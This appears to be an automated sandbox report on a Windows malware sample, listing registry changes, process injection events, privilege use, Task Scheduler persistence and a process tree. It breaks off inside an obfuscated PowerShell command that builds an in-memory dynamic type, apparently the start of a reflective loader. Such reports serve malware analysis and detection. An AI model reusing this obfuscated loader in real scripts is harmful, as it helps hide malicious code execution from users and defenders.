0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001e6bfc981000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65646332333262633438346365323462663632313739333938333766633663626630333839326164396466663130643363366665386362616339333162396136000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075626c6e6a7268660000000000000000e402feced506964aba942aaf5ab964639148d9e434feee118e664e00a0a556b8e402feced506964aba942aaf5ab964639148d9e434feee118e664e00a0a556b8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003400370034003400390030003100340033002d0033003200320031003200390032003300390037002d0034003100360038003100300033003500300033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d35e07e9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000db96f9c381a3da0157bb3ec481a3da0157bb3ec481a3da013c9f07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ab5825482000336638626533383861366535643561636431366261623834643030306236323634326530656435316432633831613863366633643433363865613035323530660000b20009000400efbeab582548ab5825482e0000000000000000000000000000000000000000000000000012d2a800330066003800620065003300380038006100360065003500640035006100630064003100360062006100620038003400640030003000300062003600320036003400320065003000650064003500310064003200630038003100610038006300360066003300640034003300360038006500610030003500320035003000660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001e6bfc981000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33663862653338386136653564356163643136626162383464303030623632363432653065643531643263383161386336663364343336386561303532353066000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075626c6e6a7268660000000000000000e402feced506964aba942aaf5ab964639248d9e434feee118e664e00a0a556b8e402feced506964aba942aaf5ab964639248d9e434feee118e664e00a0a556b8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003400370034003400390030003100340033002d0033003200320031003200390032003300390037002d0034003100360038003100300033003500300033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d35e07e9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = dd795fc481a3da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\edc232bc484ce24bf6217939837fc6cbf03892ad9dff10d3c6fe8cbac931b9a6"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = 5a07a3c381a3da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = 147d67c481a3da01	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "8324"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b6fce597-5e82-45f3	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000eefc9ec381a3da01eefc9ec381a3da01eefc9ec381a3da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ab5825482000336638626533383861366535643561636431366261623834643030306236323634326530656435316432633831613863366633643433363865613035323530660000b20009000400efbeab582548ab5825482e0000000000000000000000000000000000000000000000000012d2a800330066003800620065003300380038006100360065003500640035006100630064003100360062006100620038003400640030003000300062003600320036003400320065003000650064003500310064003200630038003100610038006300360066003300640034003300360038006500610030003500320035003000660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001e6bfc981000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33663862653338386136653564356163643136626162383464303030623632363432653065643531643263383161386336663364343336386561303532353066000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075626c6e6a7268660000000000000000e402feced506964aba942aaf5ab964638e48d9e434feee118e664e00a0a556b8e402feced506964aba942aaf5ab964638e48d9e434feee118e664e00a0a556b8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003400370034003400390030003100340033002d0033003200320031003200390032003300390037002d0034003100360038003100300033003500300033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d35e07e9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = ac31d7c381a3da01	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2104	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2572	powershell.EXE
2572	powershell.EXE
908	powershell.EXE
908	powershell.EXE
2572	powershell.EXE
2600	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
4132	Client.exe
2600	dllhost.exe
2600	dllhost.exe
908	powershell.EXE
2600	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
908	powershell.EXE
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4132	Client.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3292	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3584	Uni.exe
Token: SeDebugPrivilege	2572	powershell.EXE
Token: SeDebugPrivilege	4132	Client.exe
Token: SeDebugPrivilege	908	powershell.EXE
Token: SeDebugPrivilege	2572	powershell.EXE
Token: SeDebugPrivilege	2600	dllhost.exe
Token: SeDebugPrivilege	908	powershell.EXE
Token: SeDebugPrivilege	4876	dllhost.exe
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeAuditPrivilege	2204	svchost.exe
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeAuditPrivilege	2204	svchost.exe
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	476	dwm.exe
Token: SeCreatePagefilePrivilege	476	dwm.exe
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe
2336	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4132	Client.exe
2004	ScreenClippingHost.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
3908	RuntimeBroker.exe
3292	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3584 wrote to memory of 4424	3584	Uni.exe	81
PID 3584 wrote to memory of 4424	3584	Uni.exe	81
PID 3584 wrote to memory of 4424	3584	Uni.exe	81
PID 3584 wrote to memory of 4132	3584	Uni.exe	83
PID 3584 wrote to memory of 4132	3584	Uni.exe	83
PID 3584 wrote to memory of 4132	3584	Uni.exe	83
PID 3584 wrote to memory of 4416	3584	Uni.exe	84
PID 3584 wrote to memory of 4416	3584	Uni.exe	84
PID 3584 wrote to memory of 4416	3584	Uni.exe	84
PID 3584 wrote to memory of 2036	3584	Uni.exe	85
PID 3584 wrote to memory of 2036	3584	Uni.exe	85
PID 3584 wrote to memory of 2036	3584	Uni.exe	85
PID 4132 wrote to memory of 2132	4132	Client.exe	89
PID 4132 wrote to memory of 2132	4132	Client.exe	89
PID 4132 wrote to memory of 2132	4132	Client.exe	89
PID 4132 wrote to memory of 2812	4132	Client.exe	91
PID 4132 wrote to memory of 2812	4132	Client.exe	91
PID 4132 wrote to memory of 2812	4132	Client.exe	91
PID 2572 wrote to memory of 2600	2572	powershell.EXE	94
PID 2572 wrote to memory of 2600	2572	powershell.EXE	94
PID 2572 wrote to memory of 2600	2572	powershell.EXE	94
PID 2572 wrote to memory of 2600	2572	powershell.EXE	94
PID 2572 wrote to memory of 2600	2572	powershell.EXE	94
PID 2572 wrote to memory of 2600	2572	powershell.EXE	94
PID 2572 wrote to memory of 2600	2572	powershell.EXE	94
PID 2572 wrote to memory of 2600	2572	powershell.EXE	94
PID 2600 wrote to memory of 632	2600	dllhost.exe	5
PID 2600 wrote to memory of 692	2600	dllhost.exe	7
PID 2600 wrote to memory of 1000	2600	dllhost.exe	12
PID 2600 wrote to memory of 476	2600	dllhost.exe	13
PID 2600 wrote to memory of 536	2600	dllhost.exe	14
PID 2600 wrote to memory of 452	2600	dllhost.exe	15
PID 2600 wrote to memory of 1048	2600	dllhost.exe	16
PID 2600 wrote to memory of 1092	2600	dllhost.exe	17
PID 2600 wrote to memory of 1104	2600	dllhost.exe	18
PID 2600 wrote to memory of 1172	2600	dllhost.exe	20
PID 2600 wrote to memory of 1228	2600	dllhost.exe	21
PID 2600 wrote to memory of 1252	2600	dllhost.exe	22
PID 2600 wrote to memory of 1368	2600	dllhost.exe	23
PID 2600 wrote to memory of 1384	2600	dllhost.exe	24
PID 2600 wrote to memory of 1416	2600	dllhost.exe	25
PID 2600 wrote to memory of 1504	2600	dllhost.exe	26
PID 2600 wrote to memory of 1520	2600	dllhost.exe	27
PID 2600 wrote to memory of 1660	2600	dllhost.exe	28
PID 2600 wrote to memory of 1704	2600	dllhost.exe	29
PID 2600 wrote to memory of 1716	2600	dllhost.exe	30
PID 2600 wrote to memory of 1812	2600	dllhost.exe	31
PID 2600 wrote to memory of 1824	2600	dllhost.exe	32
PID 2600 wrote to memory of 1892	2600	dllhost.exe	33
PID 2600 wrote to memory of 1904	2600	dllhost.exe	34
PID 2600 wrote to memory of 1988	2600	dllhost.exe	35
PID 2600 wrote to memory of 2028	2600	dllhost.exe	36
PID 2600 wrote to memory of 1864	2600	dllhost.exe	37
PID 2600 wrote to memory of 2204	2600	dllhost.exe	39
PID 2600 wrote to memory of 2380	2600	dllhost.exe	40
PID 2600 wrote to memory of 2388	2600	dllhost.exe	41
PID 2600 wrote to memory of 2416	2600	dllhost.exe	42
PID 2600 wrote to memory of 2508	2600	dllhost.exe	43
PID 2600 wrote to memory of 2516	2600	dllhost.exe	44
PID 2600 wrote to memory of 2532	2600	dllhost.exe	45
PID 2600 wrote to memory of 2556	2600	dllhost.exe	46
PID 2600 wrote to memory of 2576	2600	dllhost.exe	47
PID 2600 wrote to memory of 2592	2600	dllhost.exe	48
PID 2600 wrote to memory of 3060	2600	dllhost.exe	50

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:476
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bca2a637-b1c8-4b93-a233-b7b38892bfff}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2600
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a47b2deb-b8d4-43a8-88d6-950657a72d90}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4876
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d66f85d8-4632-48b1-9159-f62f62ce7529}
  2⤵
  PID:4800

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XwSckbyoJfWJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pFKKtfuoaoKLVX,[Parameter(Position=1)][Type]$PlAXLzpOgy)$VZdZBoOQteo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+[Char](101)+''+'T'+'y'+'p'+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+'u'+[Char](116)+'o'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$VZdZBoOQteo.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'BySi'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$pFKKtfuoaoKLVX).SetImplementationFlags('R'+[Char](117)+'ntime'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$VZdZBoOQteo.DefineMethod('I'+[Char](110)+'vo'+'k'+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+'g'+','+[Char](78)+'e'+'w'+'S'+[Char](108)+'o'+'t'+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+'l',$PlAXLzpOgy,$pFKKtfuoaoKLVX).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $VZdZBoOQteo.CreateType();}$NjzmZAAkwDXxq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 